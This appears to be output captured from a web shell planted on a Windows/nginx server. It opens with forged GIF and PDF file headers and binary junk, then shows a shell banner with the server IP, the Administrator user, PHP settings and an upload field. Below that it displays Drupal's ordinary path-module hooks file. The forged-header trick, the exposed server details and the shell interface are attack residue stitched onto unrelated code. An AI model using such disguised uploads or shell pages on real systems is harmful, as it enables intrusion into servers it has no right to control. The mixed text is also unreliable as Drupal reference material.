GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/path/ |
Upload File : |
<?php /** * @file * Hooks provided by the Path module. */ /** * @addtogroup hooks * @{ */ /** * Respond to a path being inserted. * * @param array $path * The array structure is identical to that of the return value of * \Drupal\Core\Path\PathInterface::save(). * * @see \Drupal\Core\Path\PathInterface::save() */ function hook_path_insert($path) { db_insert('mytable') ->fields([ 'alias' => $path['alias'], 'pid' => $path['pid'], ]) ->execute(); } /** * Respond to a path being updated. * * @param array $path * The array structure is identical to that of the return value of * \Drupal\Core\Path\PathInterface::save(). * * @see \Drupal\Core\Path\PathInterface::save() */ function hook_path_update($path) { if ($path['alias'] != $path['original']['alias']) { db_update('mytable') ->fields(['alias' => $path['alias']]) ->condition('pid', $path['pid']) ->execute(); } } /** * Respond to a path being deleted. * * @param array $path * The array structure is identical to that of the return value of * \Drupal\Core\Path\PathInterface::save(). * * @see \Drupal\Core\Path\PathInterface::delete() */ function hook_path_delete($path) { db_delete('mytable') ->condition('pid', $path['pid']) ->execute(); } /** * @} End of "addtogroup hooks". */